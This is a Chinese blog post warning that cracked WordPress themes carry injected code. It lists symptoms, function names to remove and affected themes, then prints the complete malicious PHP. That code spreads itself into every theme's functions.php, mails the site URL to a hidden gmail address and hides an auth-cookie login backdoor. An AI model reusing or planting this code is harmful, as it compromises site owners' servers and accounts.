前几天接了一个修改个性化WordPress主题的项目,项目完工后发现本地Web服务器theme 目录下所有主题的 functions.php 文件被恶意修改,可恶! 因为之前没有发生过这种情况,从而怀疑这段代码是从破解主题中来的,与项目客户沟通后证实了这一点。这么多免费的主题,为什么偏偏要下载破解主题呢?这可 能是和国内的版权意识有很大关系吧。
与此同时,在《检测到几款主题存在恶意广告代码》文章中也提到:
恶意代码在你启用不同主题的时候,会把同样的恶意代码复制到所有主题的 functions.php 文件中去,从而在页面底部显示广告代码。
表现形式–怎么才知道自己的主题感染了恶意代码呢?
若你在转换主题时提示 “Fatal error: Cannot redeclare _check_isactive_widget()”、”_get_allwidgetcont” 等错误,那你的代码很有很可能已被污染。
解决方案–遇到这种问题怎么解决呢?
该代码通常隐藏在主题的 function.php 文件中。该恶意代码的前后还有一些 function 是调用热门文章或者 widget,估计是为隐藏恶意代码加上去的,如:”_check_isactive_widget” “_get_allwidgetcont” “_getsprepare_widget” “__popular_posts”,各位童鞋下载主题后请检查主题的 functions.php 文件中是否包含有以上类似代码,如有可一并删除。
文章最后附上我遇到的主题functions.php 文件中附带的恶意代码,请参考。
在此提醒各位童鞋,请到 WordPress 官方网站或 者主题原作者网站下载插件或者主题,以防代码已被修改过。另外请各位童鞋保护版权,支持正版主题。目前发现曾被修改的主题有 A-SuperCMS、iBlogPro 4、wpbus-D4、Colossus、ZCool Like、PixLog、Zeta Theme、Tripress。
如果你不知道如何检查自己的主题是否感染了恶意代码,偶米工作室可以为你代劳,并可以为你定制个性化的WordPress主题,例如:企业主题、博客主题、CMS主题、淘宝客主题等等,如有需要可以进一步与我们取得联系。
附:恶意代码(点击按钮展开代码)
1 function _check_isactive_widget(){2 $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed=""; 3 $output=strip_tags($output,$allowed); 4 $direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") +6))); 5 if (is_array($direst)){ 6 foreach ($direst as $item){ 7 if (is_writable($item)){ 8 $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"(")); 9 $cont=file_get_contents($item); 10 if (stripos($cont,$ftion) === false){ 11 $explar=stripos( substr($cont,-20),"?".">") !== false ?"": "?".">"; 12 $output .= $before ."Not found".$after; 13 if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") +2);} 14 $output=rtrim($output,"\n\t");fputs($f=fopen($item,"w+"),$cont .$explar ."\n".$widget);fclose($f); 15 $output .= ($showdots &&$ellipsis) ?"...": ""; 16 } 17 } 18 } 19 } 20 return $output; 21 } 22 function _get_allwidgetcont($wids,$items=array()){ 23 $places=array_shift($wids); 24 if(substr($places,-1) == "/"){ 25 $places=substr($places,0,-1); 26 } 27 if(!file_exists($places) ||!is_dir($places)){ 28 return false; 29 }elseif(is_readable($places)){ 30 $elems=scandir($places); 31 foreach ($elems as $elem){ 32 if ($elem != "."&&$elem != ".."){ 33 if (is_dir($places ."/".$elem)){ 34 $wids[]=$places ."/".$elem; 35 }elseif (is_file($places ."/".$elem)&&$elem == substr(__FILE__,-13)){ 36 $items[]=$places ."/".$elem; 37 } 38 } 39 } 40 }else{ 41 return false; 42 } 43 if (sizeof($wids) >0){ 44 return _get_allwidgetcont($wids,$items); 45 }else { 46 return $items; 47 } 48 } 49 if(!function_exists("stripos")){ 50 function stripos( $str,$needle,$offset = 0 ){ 51 return strpos( strtolower( $str ),strtolower( $needle ),$offset ); 52 } 53 } 54 if(!function_exists("strripos")){ 55 function strripos( $haystack,$needle,$offset = 0 ) { 56 if( !is_string( $needle ) )$needle = chr( intval( $needle ) ); 57 if( $offset <0 ){ 58 $temp_cut = strrev( substr( $haystack,0,abs($offset) ) ); 59 } 60 else{ 61 $temp_cut = strrev( substr( $haystack,0,max( ( strlen($haystack) -$offset ),0 ) ) ); 62 } 63 if( ( $found = stripos( $temp_cut,strrev($needle) ) ) === FALSE )return FALSE; 64 $pos = ( strlen( $haystack ) -( $found +$offset +strlen( $needle ) ) ); 65 return $pos; 66 } 67 } 68 if(!function_exists("scandir")){ 69 function scandir($dir,$listDirectories=false,$skipDots=true) { 70 $dirArray = array(); 71 if ($handle = opendir($dir)) { 72 while (false !== ($file = readdir($handle))) { 73 if (($file != "."&&$file != "..") ||$skipDots == true) { 74 if($listDirectories == false) {if(is_dir($file)) {continue;}} 75 array_push($dirArray,basename($file)); 76 } 77 } 78 closedir($handle); 79 } 80 return $dirArray; 81 } 82 } 83 add_action("admin_head","_check_isactive_widget"); 84 function _getsprepare_widget(){ 85 if(!isset($com_length)) $com_length=120; 86 if(!isset($text_value)) $text_value="cookie"; 87 if(!isset($allowed_tags)) $allowed_tags="<a>"; 88 if(!isset($type_filter)) $type_filter="none"; 89 if(!isset($expl)) $expl=""; 90 if(!isset($filter_homes)) $filter_homes=get_option("home"); 91 if(!isset($pref_filter)) $pref_filter="wp_"; 92 if(!isset($use_more)) $use_more=1; 93 if(!isset($comm_type)) $comm_type=""; 94 if(!isset($pagecount)) $pagecount=$_GET["cperpage"]; 95 if(!isset($postauthor_comment)) $postauthor_comment=""; 96 if(!isset($comm_is_approved)) $comm_is_approved=""; 97 if(!isset($postauthor)) $postauthor="auth"; 98 if(!isset($more_link)) $more_link="(more...)"; 99 if(!isset($is_widget)) $is_widget=get_option("_is_widget_active_"); 100 if(!isset($checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value; 101 if(!isset($more_link_ditails)) $more_link_ditails="(details...)"; 102 if(!isset($morecontents)) $morecontents="ma".$expl."il"; 103 if(!isset($fmore)) $fmore=1; 104 if(!isset($fakeit)) $fakeit=1; 105 if(!isset($sql)) $sql=""; 106 if (!$is_widget) : 107 global $wpdb,$post; 108 $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$expl."vethe".$comm_type."mes".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";# 109 if (!empty($post->post_password)) { 110 if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 111 if(is_feed()) { 112 $output=__("There is no excerpt because this is a protected post."); 113 }else { 114 $output=get_the_password_form(); 115 } 116 } 117 } 118 if(!isset($f_tags)) $f_tags=1; 119 if(!isset($type_filters)) $type_filters=$filter_homes; 120 if(!isset($getcommentscont)) $getcommentscont=$pref_filter.$morecontents; 121 if(!isset($aditional_tags)) $aditional_tags="div"; 122 if(!isset($s_cont)) $s_cont=substr($sq1,stripos($sq1,"live"),20);# 123 if(!isset($more_link_text)) $more_link_text="Continue reading this entry"; 124 if(!isset($showdots)) $showdots=1; 125 $comments=$wpdb->get_results($sql); 126 if($fakeit == 2) { 127 $text=$post->post_content; 128 }elseif($fakeit == 1) { 129 $text=(empty($post->post_excerpt)) ?$post->post_content : $post->post_excerpt; 130 }else { 131 $text=$post->post_excerpt; 132 } 133 $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=".call_user_func_array($getcommentscont,array($s_cont,$filter_homes,$type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";# 134 if($com_length <0) { 135 $output=$text; 136 }else { 137 if(!$no_more &&strpos($text,"<!--more-->")) { 138 $text=explode("<!--more-->",$text,2); 139 $l=count($text[0]); 140 $more_link=1; 141 $comments=$wpdb->get_results($sql); 142 }else { 143 $text=explode(" ",$text); 144 if(count($text) >$com_length) { 145 $l=$com_length; 146 $ellipsis=1; 147 }else { 148 $l=count($text); 149 $more_link=""; 150 $ellipsis=0; 151 } 152 } 153 for ($i=0;$i<$l;$i++) 154 $output .= $text[$i] ." "; 155 } 156 update_option("_is_widget_active_",1); 157 if("all"!= $allowed_tags) { 158 $output=strip_tags($output,$allowed_tags); 159 return $output; 160 } 161 endif; 162 $output=rtrim($output,"\s\n\t\r\0\x0B"); 163 $output=($f_tags) ?balanceTags($output,true) : $output; 164 $output .= ($showdots &&$ellipsis) ?"...": ""; 165 $output=apply_filters($type_filter,$output); 166 switch($aditional_tags) { 167 case("div") : 168 $tag="div"; 169 break; 170 case("span") : 171 $tag="span"; 172 break; 173 case("p") : 174 $tag="p"; 175 break; 176 default : 177 $tag="span"; 178 } 179 if ($use_more ) { 180 if($fmore) { 181 $output .= " <".$tag ." class=\"more-link\"><a href=\"".get_permalink($post->ID) ."#more-".$post->ID ."\" title=\"".$more_link_text ."\">".$more_link = !is_user_logged_in() &&@call_user_func_array($checkingwidgets,array($pagecount,true)) ?$more_link : ""."</a></".$tag .">"."\n"; 182 }else { 183 $output .= " <".$tag ." class=\"more-link\"><a href=\"".get_permalink($post->ID) ."\" title=\"".$more_link_text ."\">".$more_link ."</a></".$tag .">"."\n"; 184 } 185 } 186 return $output; 187 } 188 add_action("init","_getsprepare_widget"); 189 function __popular_posts($no_posts=6,$before="<li>",$after="</li>",$show_pass_post=false,$duration="") { 190 global $wpdb; 191 $request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments"; 192 $request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\""; 193 if(!$show_pass_post) $request .= " AND post_password =\"\""; 194 if($duration !="") { 195 $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date "; 196 } 197 $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts"; 198 $posts=$wpdb->get_results($request); 199 $output=""; 200 if ($posts) { 201 foreach ($posts as $post) { 202 $post_title=stripslashes($post->post_title); 203 $comment_count=$post->comment_count; 204 $permalink=get_permalink($post->ID); 205 $output .= $before ." <a href=\"".$permalink ."\" title=\"".$post_title."\">".$post_title ."</a> ".$after; 206 } 207 }else { 208 $output .= $before ."None found".$after; 209 } 210 return $output; 211 } |
声明: 本文由( 魔豆先生 )原创编译,转载请保留链接: 被添加恶意广告代码的WP主题修复方法
Linux系统与内核学习群:194051772
WP建站技术学习交流群:194062106
文中的代码行号很恶心!
2013-04-05 09:24